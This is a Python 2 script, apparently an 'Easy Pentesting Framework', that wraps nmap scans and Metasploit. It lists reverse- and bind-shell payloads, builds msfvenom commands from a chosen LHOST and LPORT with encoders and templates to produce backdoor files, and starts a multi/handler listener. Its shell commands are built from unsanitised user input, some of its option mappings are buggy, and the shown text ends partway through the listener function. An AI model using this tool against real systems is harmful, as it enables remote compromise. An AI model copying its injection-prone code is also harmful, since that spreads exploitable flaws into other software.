2019-01-14T17:46:10.000Z
|
2019-01-14T17:46:10.000Z
|
#!/usr/bin/python
import subprocess
import time, sys
import os
global wifi
global eth
global name
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def banner(name,length):
print bcolors.HEADER+bcolors.BOLD+bcolors.FAIL+"*" * (length + 4)
print "*"," "*len(name),"*"
print "*", name, "*"
print "*"," "*len(name),"*"
print "*" * (length + 4) +bcolors.ENDC
def verifyhost(ipaddr):
com=Command("ping -c 1 " + ipaddr).run()
if com.error:
return 1
else:
return 0
def basicscan(ipaddr):
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"\n[*] Choose your scan type: "+bcolors.ENDC
mychoice=raw_input("\n\n1) TCP Connect\n2) SYN Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
if (mychoice.isdigit()) and (len(mychoice) == 1):
dict = {'1': '-sT', '2': '-sS'}
com = Command("nmap "+ipaddr+" "+dict[mychoice]+" "+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+ com.error + bcolors.ENDC
else:
print bcolors.FAIL +bcolors.BOLD+ "\n[-] Error: Please note that multiple scans of this type cannot be performed simultaneously"+ bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def advancedscan(ipaddr):
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"Choose your scan type: "+bcolors.ENDC
dict = {'1': '-sF', '2': '-sN', '3': '-sX'}
mychoice=raw_input("\n\n1) FIN Scan\n2) Null Scan\n3) Xmas Tree Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
if (mychoice.isdigit()) and (len(mychoice) == 1):
com = Command("nmap "+ipaddr+" "+dict[mychoice]+" "+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+ com.error + bcolors.ENDC
else:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Please note that multiple scans of this type cannot be performed simultaneously"+ bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def pingscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sP "+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+ com.error + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def udpscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sU "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def protoscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sO "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def idlescan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sI "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def version(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sV "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def ackscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sA "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def windowscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sW "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def rpcscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sR "+form+" "+filename).run()
print com.output
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def listscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -sL "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def osscan(ipaddr):
os.system('clear')
com = Command("nmap "+ipaddr+" -O "+form+" "+filename).run()
print com.output
if com.error:
print "\n[-] Error: "+com.error
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def multiscan(ipaddr,parameter):
os.system('clear')
banner(name,length_name)
mystring = ""
for i in parameter:
mystring = mystring + i
com = Command("nmap "+ipaddr+mystring+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+com.error + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def nmapmain():
os.system('clear')
global name
global length_name
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to NMAP !\n"+ bcolors.ENDC
ipaddr = raw_input("\n[*] Enter the host ip or host name (Eg: 192.168.0.1 or google.com): ")
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
while (verifyhost(ipaddr)):
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid host or host seems down try pinging first !\n"+ bcolors.ENDC
ipaddr = raw_input("\n[*] Enter the host ip or host name (Eg: 192.168.0.1 or google.com): ")
print bcolors.HEADER + bcolors.BOLD+"\n[*] Done ...\n" +bcolors.ENDC
chc=raw_input("\n[*] Would you like to store the output in a file (Y/N): ")
if chc == 'Y' or chc == 'y' or chc == 'Yes' or chc == 'yes':
global form
global formatfile
global filename
form = raw_input("\n[*] Enter the file format: Output scan in normal(O) or XML(X) or Grepable (G): ")
while form != 'O' and form != 'X' and form != 'G':
form = raw_input("\n[*] Enter the file format: Output scan in normal(O) or XML(X) or Grepable (G): ")
dict = {'O':' -oO ','X':' -oX ','G':' -oG '}
form = dict[form]
filename=raw_input("\n[*] Enter the filename: ")
else:
form=""
filename=""
while True:
os.system('clear')
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[*] Choose your scan type: "+ bcolors.ENDC
mychoice=raw_input("\n1) Basic Scanning\n2) Advanced Scanning\n3) Ping Scan\n4) UDP Scan\n5) IP Protocol Scan\n6) Idle Scanning\n7) Version detection\n8) ACK Scan\n9) Window Scan \n10) RPC Scan \n11) List Scan\n12) OS Fingerprinting\n13) Change host details\n14) Return to previous menu\n"+bcolors.HEADER + bcolors.BOLD+"\n[*] Choose your option (You can choose multiple options at once by using ',' as a delimiter: "+bcolors.ENDC)
mylist=[]
mylist = mychoice.split(',')
if len(mylist)==1:
choice = mylist[0]
if int(choice) == 1:
basicscan(ipaddr)
elif int(choice) == 2:
advancedscan(ipaddr)
elif int(choice) ==3:
pingscan(ipaddr)
elif int(choice)==4:
udpscan(ipaddr)
elif int(choice) == 5:
protoscan(ipaddr)
elif int(choice) ==6:
idlescan(ipaddr)
elif int(choice)==7:
version(ipaddr)
elif int(choice) == 8:
ackscan(ipaddr)
elif int(choice) ==9:
windowscan(ipaddr)
elif int(choice) == 10:
rpcscan(ipaddr)
elif int(choice) ==11:
listscan(ipaddr)
elif int(choice)==12:
osscan(ipaddr)
elif int(choice)==13:
nmapmain()
elif int(choice)==14:
options()
else:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
if len(mylist)>1:
global multi
multi = []
if '1' in mylist:
mychoice=raw_input("\n\n1) TCP Connect\n2) SYN Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"Choose your option: "+bcolors.ENDC)
dict = {'1': ' -sT ', '2': ' -sS '}
multi.append(dict[mychoice])
if '2' in mylist:
dict = {'1': ' -sF ', '2': ' -sN ', '3': ' -sX '}
mychoice=raw_input("\n\n1) FIN Scan\n2) Null Scan\n3) Xmas Tree Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"Choose your option: "+bcolors.ENDC)
multi.append(dict[mychoice])
if '3' in mylist:
multi.append(' -sP ')
if '4' in mylist:
multi.append(' -sU ')
if '5' in mylist:
multi.append(' -sP ')
if '6' in mylist:
multi.append(' -sI ')
if '7' in mylist:
multi.append(' -sV ')
if '8' in mylist:
multi.append(' -sA ')
if '9' in mylist:
multi.append(' -sR ')
if '10' in mylist:
multi.append(' -sL ')
if '11' in mylist:
multi.append(' -sW ')
if '12' in mylist:
multi.append(' -O ')
if '13' in mylist:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
continue
multiscan(ipaddr,multi)
def checkpath(path):
com = Command("cd "+path).run()
while com.error:
print bcolors.FAIL + bcolors.BOLD+ "\n[-] Error: No such directory"+bcolors.ENDC
path = raw_input(bcolors.HEADER+"\n[*] Please provide a valid path(Eg: '/root/Desktop/'): "+ bcolors.ENDC)
com = Command("cd "+path).run()
return path
#Function to get details of platforms
def platforms():
os.system('clear')
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
com = Command("msfvenom --help-platforms").run()
mylist = com.error
mylist=mylist.split('\n')
mylist[1]=mylist[1].strip('\t')
mynew = []
os.system('clear')
os.system('clear')
mynew = mylist[1].split(',')
for i in range(0,len(mynew)):
if ' ' in mynew[i]:
mynew[i]=mynew[i].strip()
print bcolors.HEADER+ "Platforms available: "+bcolors.ENDC
for i in range(0,len(mynew)):
print str(i+1)+". "+mynew[i]
choice = input(bcolors.HEADER + bcolors.BOLD+"\n[*] Select your platform(1 - "+str(len(mynew))+"): "+ bcolors.ENDC)
for i in range(0,len(mynew)+1):
if i == choice:
pf=mynew[i-1]
print bcolors.HEADER + bcolors.BOLD+"\nYour platform: "+pf+ bcolors.ENDC
return pf
#Function to get details of NOPS
def nops():
os.system('clear')
os.system('clear')
mylist = []
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
com = Command("msfvenom -l nops | cut -d \" \" -f 5").run()
mylist = com.output
os.system('clear')
os.system('clear')
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
mylist = mylist.split('\n')
print bcolors.HEADER +"NOPS available: "+ bcolors.ENDC
for i in range(0,len(mylist)):
if i>5:
print str(i-5)+". "+mylist[i]
if 'x86/single_byte' in mylist[i]:
break
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your nop(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
for i in range(0,len(mylist)+1):
if i-5 == choice:
nop = mylist[i]
print bcolors.HEADER + bcolors.BOLD+"\nYour nop: "+nop+ bcolors.ENDC
return nop
#Function to get list of encoders
def encoders():
os.system('clear')
os.system('clear')
mylist = []
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
com = Command("msfvenom -l encoders | cut -d \" \" -f 5").run()
mylist = com.output
os.system('clear')
os.system('clear')
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
mylist = mylist.split('\n')
print bcolors.HEADER + "Encoders available: " +bcolors.ENDC
for i in range(0,len(mylist)+1):
if i>5:
print str(i-5)+". "+mylist[i]
if 'x86/unicode_upper' in mylist[i]:
break
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your encoder(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
for i in range(0,len(mylist)):
if i-5 == choice:
encoder = mylist[i]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your encoder: "+encoder+ bcolors.ENDC
return encoder
#Function to get formats
def myformat():
os.system('clear')
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
com = Command("msfvenom --help-formats").run()
mylist = com.error
os.system('clear')
os.system('clear')
mylist=mylist.split('\n')
mylist[1]=mylist[1].strip('\t')
mylist[3]=mylist[3].strip('\t')
mynew = []
mynew = mylist[1].split(',')
mynew = mynew + mylist[3].split(',')
for i in range(0,len(mynew)):
if ' ' in mynew[i]:
mynew[i]=mynew[i].strip()
print bcolors.HEADER +"[*] Formats available: "+bcolors.ENDC
for i in range(0,len(mynew)):
print str(i+1)+". "+mynew[i]
choice = input(bcolors.HEADER + bcolors.BOLD+"\n[*] Select your format(1 - "+str(len(mynew))+"): "+ bcolors.ENDC)
for i in range(0,len(mynew)+1):
if i == choice:
myform = mynew[i-1]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your format: "+ myform + bcolors.ENDC
return myform
#function to initialise the various options in a payload
def actualpayload(payload):
os.system('clear')
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"\n[*] Payload creation: "+bcolors.ENDC
inp = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed with payload: "+bcolors.ENDC+payload+bcolors.HEADER+" or press 'b' to select payload again: "+bcolors.ENDC)
if inp == 'b' or inp =='B':
createpayload()
lhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host (LHOST): "+bcolors.ENDC)
lport = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host (LPORT): "+bcolors.ENDC)
filename = raw_input( bcolors.HEADER+"\n[*] Please enter the name of the file with extension: "+bcolors.ENDC)
path = raw_input(bcolors.HEADER+"\n[*] Please provide a path: "+bcolors.ENDC)
path=checkpath(path)
os.system('clear')
os.system('clear')
print bcolors.HEADER+bcolors.BOLD+ "\n[*] Your options till now:"+bcolors.ENDC+bcolors.HEADER+"\n\n[+] Payload: "+bcolors.ENDC+payload+bcolors.HEADER+"\n[+] LHOST: "+bcolors.ENDC+lhost+bcolors.HEADER+"\n[+] LPORT: "+bcolors.ENDC+lport+bcolors.HEADER+"\n[+] Filename: "+bcolors.ENDC+filename+bcolors.HEADER+"\n[+] Path: "+bcolors.ENDC+path+"\n"
get = raw_input(bcolors.HEADER+"\n[*] Press any key to continue or 'b' to reset selected options: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
actualpayload(payload)
mychoice = raw_input( bcolors.HEADER+bcolors.BOLD+"\n[*] These are your payload options:"+bcolors.ENDC+" \n\n1) Encoders\n2) NOPS\n3) Formats\n4) Architecture\n5) Platform\n6) Iterations\n7) Template\n\n[*] Please select one or more options using ',' as a delimiter: ")
command="msfvenom -p "+payload+" LHOST="+lhost+" LPORT="+lport
mylist=[]
mylist = mychoice.split(',')
if '1' in mylist:
encoder=encoders()
encoder = ' -e '+encoder
command = command + encoder
if '2' in mylist:
nop=nops()
nop = ' -n '+nop
command = command + nop
if '3' in mylist:
formats=myformat()
formats = ' -f '+formats
command = command +formats
if '4' in mylist:
os.system("clear")
os.system('clear')
architecture = raw_input(bcolors.HEADER+"\n[*] Enter the target architecture (x64/x86): "+bcolors.ENDC)
architecture = " -a "+architecture
command = command +architecture
if '5' in mylist:
platform=platforms()
platform = " --platform "+platform
command = command +platform
if '6' in mylist:
os.system("clear")
os.system('clear')
iterations = raw_input(bcolors.HEADER+"\n[*] Enter the number of iterations (1-200): "+bcolors.ENDC)
iterations = " -i "+iterations
command = command +iterations
if '7' in mylist:
os.system("clear")
os.system('clear')
template = raw_input(bcolors.HEADER+"\n[*] Enter the name of the template: "+bcolors.ENDC)
template = " -x "+template
command = command + template
if path != "":
if path[len(path)-1] == '/':
command = command+ ' -o '+path+filename
else:
command = command+ ' -o '+path+"/"+filename
else:
command = command + ' -o '+filename
os.system("clear")
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ..." +bcolors.ENDC
com = Command(command).run()
os.system("clear")
os.system('clear')
print bcolors.FAIL + bcolors.BOLD+"\n[*] "+com.error+bcolors.ENDC
opt = raw_input(bcolors.HEADER+"\n\n[*] Press any key to return or press 'b' to register payload options: "+ bcolors.ENDC)
if opt == 'b' or opt == 'B':
actualpayload(payload)
return
#function to get name of payload
def createpayload():
while 1:
os.system('clear')
os.system('clear')
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Select your option.... "+ bcolors.ENDC
mychoice=raw_input("\n1) List all payloads\n2) List payloads by keyword (Eg: windows, python, linux)\n3) List most common payloads\n4) Return to previous menu\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
if mychoice == '1':
mylist = []
print bcolors.HEADER + bcolors.BOLD+"\n\n[*] Please Wait ...\n" +bcolors.ENDC
com = Command("msfvenom -l payloads | cut -d \" \" -f 5").run()
mylist = com.output
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
mylist = mylist.split('\n')
for i in range(0,len(mylist)):
if i > 5:
print str(i-5)+". "+mylist[i]
if 'windows/x64/vncinject/reverse_winhttps' in mylist[i]:
break
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
for i in range(0,len(mylist)):
if i-5 == choice:
payload = mylist[i]
print bcolors.HEADER + bcolors.BOLD+"\nYour payload: "+bcolors.ENDC+payload
get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
elif mychoice == '2':
keyword=raw_input(bcolors.HEADER+"\n[*] Enter keyword: "+bcolors.ENDC)
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
com = Command("msfvenom -l payloads | grep "+keyword+" | cut -d \" \" -f 5").run()
mylist = com.output
if mylist == "":
print bcolors.FAIL + bcolors.BOLD+ "\n[-] Error: Wrong keyword" + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
continue
if com.error:
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
continue
mylist = mylist.split('\n')
for i in range(1,len(mylist)):
print str(i)+". "+mylist[i-1]
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-1)+"): "+ bcolors.ENDC)
for i in range(1,len(mylist)):
if i == choice:
payload = mylist[i-1]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
elif mychoice == '3':
payloadlist = [ ['windows/meterpreter/reverse_tcp','windows/shell/bind_tcp','windows/shell/reverse_tcp','windows/shell_bind_tcp','windows/shell_reverse_tcp','windows/x64/meterpreter/bind_tcp','windows/x64/meterpreter/bind_tcp_uuid','windows/x64/meterpreter/reverse_http','windows/x64/meterpreter/reverse_https','windows/x64/meterpreter/reverse_tcp','windows/x64/meterpreter/reverse_tcp_uuid','windows/x64/meterpreter_bind_tcp','windows/x64/meterpreter_reverse_http','windows/x64/meterpreter_reverse_https','windows/x64/meterpreter_reverse_tcp','windows/x64/powershell_bind_tcp','windows/x64/powershell_reverse_tcp','windows/x64/shell/bind_ipv6_tcp','windows/x64/shell/bind_ipv6_tcp_uuid','windows/x64/shell/bind_tcp','windows/x64/shell/bind_tcp_uuid','windows/x64/shell/reverse_tcp','windows/x64/shell/reverse_tcp_uuid','windows/x64/shell_bind_tcp','windows/x64/shell_reverse_tcp','windows/meterpreter/bind_tcp','windows/meterpreter/reverse_http','windows/meterpreter/reverse_https','windows/meterpreter_reverse_http','windows/meterpreter_reverse_https','windows/meterpreter_reverse_tcp','cmd/windows/generic','cmd/windows/powershell_bind_tcp','cmd/windows/powershell_reverse_tcp','cmd/windows/reverse_powershell'],['python/meterpreter/bind_tcp','python/meterpreter/reverse_http','python/meterpreter/reverse_https','python/meterpreter/reverse_tcp','python/meterpreter/reverse_tcp_ssl','python/meterpreter_bind_tcp','python/meterpreter_reverse_http','python/meterpreter_reverse_https','python/meterpreter_reverse_tcp'],['linux/x64/meterpreter/bind_tcp','linux/x64/meterpreter/reverse_tcp','linux/x64/meterpreter_reverse_http','linux/x64/meterpreter_reverse_https','linux/x64/meterpreter_reverse_tcp','linux/x64/shell/bind_tcp','linux/x64/shell/reverse_tcp','linux/x64/shell_bind_tcp','linux/x64/shell_find_port','linux/x64/shell_reverse_tcp' ],['cmd/unix/bind_netcat','cmd/unix/bind_nodejs','cmd/unix/bind_perl','cmd/unix/generic','cmd/unix/interact','cmd/unix/reverse','cmd/unix/reverse_bash','cmd/unix/reverse_bash_telnet_ssl','cmd/unix/reverse_ncat_ssl','cmd/unix/reverse_netcat','cmd/unix/reverse_nodejs','cmd/unix/reverse_openssl','cmd/unix/reverse_perl','cmd/unix/reverse_perl_ssl','cmd/unix/reverse_php_ssl','cmd/unix/reverse_python','cmd/unix/reverse_python_ssl']]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Select the platform ... "+ bcolors.ENDC
choice=raw_input("\n1) Windows\n2) Python\n3) Linux\n4) Unix\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
plat = ['Windows','Python','Linux','Unix']
print bcolors.HEADER+"\n[*]Platform: "+plat[int(choice)-1]+"\n"+bcolors.ENDC
for i in range (1,len(payloadlist[int(choice)-1])):
print str(i)+". "+ payloadlist[int(choice)-1][i]
chc = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(payloadlist[int(choice)-1])-1)+"): "+ bcolors.ENDC)
for i in range(0,len(payloadlist[int(choice)-1])):
if i == chc:
payload = payloadlist[int(choice)-1][i]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
get = raw_input(bcolors.HEADER+"\nPress any key to return..."+ bcolors.ENDC)
elif mychoice == '4':
metamain()
actualpayload(payload)
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
return
def payload_listener():
while 1:
os.system('clear')
os.system('clear')
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Select your option.... "+ bcolors.ENDC
mychoice=raw_input("\n1) List all payloads\n2) List payloads by keyword (Eg: windows, python, linux)\n3) List most common payloads\n4) Return to previous menu\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
if mychoice == '1':
mylist = []
print bcolors.HEADER + bcolors.BOLD+"\n\n[*] Please Wait ...\n" +bcolors.ENDC
com = Command("msfvenom -l payloads | cut -d \" \" -f 5").run()
mylist = com.output
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
mylist = mylist.split('\n')
for i in range(0,len(mylist)):
if i > 5:
print str(i-5)+". "+mylist[i]
if 'windows/x64/vncinject/reverse_winhttps' in mylist[i]:
break
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-8)+"): "+ bcolors.ENDC)
for i in range(0,len(mylist)):
if i-5 == choice:
payload = mylist[i]
print bcolors.HEADER + bcolors.BOLD+"\nYour payload: "+bcolors.ENDC+payload
get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
elif mychoice == '2':
keyword=raw_input(bcolors.HEADER+"\n[*] Enter keyword: "+bcolors.ENDC)
print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
com = Command("msfvenom -l payloads | grep "+keyword+" | cut -d \" \" -f 5").run()
mylist = com.output
if mylist == "":
print bcolors.FAIL + bcolors.BOLD+ "\n[-] Error: Wrong keyword" + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
continue
if com.error:
print bcolors.FAIL + bcolors.BOLD+ com.error + bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to reset ... "+ bcolors.ENDC)
continue
mylist = mylist.split('\n')
for i in range(1,len(mylist)):
print str(i)+". "+mylist[i-1]
choice = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(mylist)-1)+"): "+ bcolors.ENDC)
for i in range(1,len(mylist)):
if i == choice:
payload = mylist[i-1]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
elif mychoice == '3':
payloadlist = [ ['windows/meterpreter/reverse_tcp','windows/shell/bind_tcp','windows/shell/reverse_tcp','windows/shell_bind_tcp','windows/shell_reverse_tcp','windows/x64/meterpreter/bind_tcp','windows/x64/meterpreter/bind_tcp_uuid','windows/x64/meterpreter/reverse_http','windows/x64/meterpreter/reverse_https','windows/x64/meterpreter/reverse_tcp','windows/x64/meterpreter/reverse_tcp_uuid','windows/x64/meterpreter_bind_tcp','windows/x64/meterpreter_reverse_http','windows/x64/meterpreter_reverse_https','windows/x64/meterpreter_reverse_tcp','windows/x64/powershell_bind_tcp','windows/x64/powershell_reverse_tcp','windows/x64/shell/bind_ipv6_tcp','windows/x64/shell/bind_ipv6_tcp_uuid','windows/x64/shell/bind_tcp','windows/x64/shell/bind_tcp_uuid','windows/x64/shell/reverse_tcp','windows/x64/shell/reverse_tcp_uuid','windows/x64/shell_bind_tcp','windows/x64/shell_reverse_tcp','windows/meterpreter/bind_tcp','windows/meterpreter/reverse_http','windows/meterpreter/reverse_https','windows/meterpreter_reverse_http','windows/meterpreter_reverse_https','windows/meterpreter_reverse_tcp','cmd/windows/generic','cmd/windows/powershell_bind_tcp','cmd/windows/powershell_reverse_tcp','cmd/windows/reverse_powershell'],['python/meterpreter/bind_tcp','python/meterpreter/reverse_http','python/meterpreter/reverse_https','python/meterpreter/reverse_tcp','python/meterpreter/reverse_tcp_ssl','python/meterpreter_bind_tcp','python/meterpreter_reverse_http','python/meterpreter_reverse_https','python/meterpreter_reverse_tcp'],['linux/x64/meterpreter/bind_tcp','linux/x64/meterpreter/reverse_tcp','linux/x64/meterpreter_reverse_http','linux/x64/meterpreter_reverse_https','linux/x64/meterpreter_reverse_tcp','linux/x64/shell/bind_tcp','linux/x64/shell/reverse_tcp','linux/x64/shell_bind_tcp','linux/x64/shell_find_port','linux/x64/shell_reverse_tcp' ],['cmd/unix/bind_netcat','cmd/unix/bind_nodejs','cmd/unix/bind_perl','cmd/unix/generic','cmd/unix/interact','cmd/unix/reverse','cmd/unix/reverse_bash','cmd/unix/reverse_bash_telnet_ssl','cmd/unix/reverse_ncat_ssl','cmd/unix/reverse_netcat','cmd/unix/reverse_nodejs','cmd/unix/reverse_openssl','cmd/unix/reverse_perl','cmd/unix/reverse_perl_ssl','cmd/unix/reverse_php_ssl','cmd/unix/reverse_python','cmd/unix/reverse_python_ssl']]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Select the platform ... "+ bcolors.ENDC
choice=raw_input("\n1) Windows\n2) Python\n3) Linux\n4) Unix\n\n"+bcolors.HEADER+bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
plat = ['Windows','Python','Linux','Unix']
print bcolors.HEADER+"\n[*]Platform: "+plat[int(choice)-1]+"\n"+bcolors.ENDC
for i in range (1,len(payloadlist[int(choice)-1])):
print str(i)+". "+ payloadlist[int(choice)-1][i]
chc = input(bcolors.HEADER + bcolors.BOLD+"\n\n[*] Select your payload(1 - "+str(len(payloadlist[int(choice)-1])-1)+"): "+ bcolors.ENDC)
for i in range(0,len(payloadlist[int(choice)-1])):
if i == chc:
payload = payloadlist[int(choice)-1][i]
print bcolors.HEADER + bcolors.BOLD+"\n[+] Your payload: "+bcolors.ENDC+payload
get = raw_input(bcolors.HEADER+"\n[*] Press any key to proceed or 'b' to reselect payload: "+ bcolors.ENDC)
if get == 'b' or get == 'B':
continue
else:
break
get = raw_input(bcolors.HEADER+"\nPress any key to return..."+ bcolors.ENDC)
elif mychoice == '4':
return
return payload
def listener():
while 1:
os.system('clear')
os.system('clear')
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to the exploit module... "+ bcolors.ENDC
command ="msfconsole -x \" "
exploit = "multi/handler "
choice = raw_input(bcolors.HEADER+"\n[*] Please enter the exploit name only if you know the full path else use the 'search' option once redirected to the metasploit framework... \n"+bcolors.ENDC+"\n1) Keep exploit option blank\n2) Proceed with "+exploit+"\n3) Specify exploit"+"\n4) Return to previous menu"+bcolors.HEADER+"\n\n[*] Please select an option: "+bcolors.ENDC)
if choice == '1':
exploit = ""
elif choice == '2':
exploit = exploit
command = command + "use "+ exploit +";"
elif choice == '3':
exploit = raw_input(bcolors.HEADER+"\n[*] Please enter the exploit name correctly along with path: "+bcolors.ENDC)
command = command + "use "+ exploit +";"
elif choice == '4':
metamain()
else:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
gt = raw_input(bcolors.HEADER+"\n[*] Press any key to reselect..."+ bcolors.ENDC)
listener()
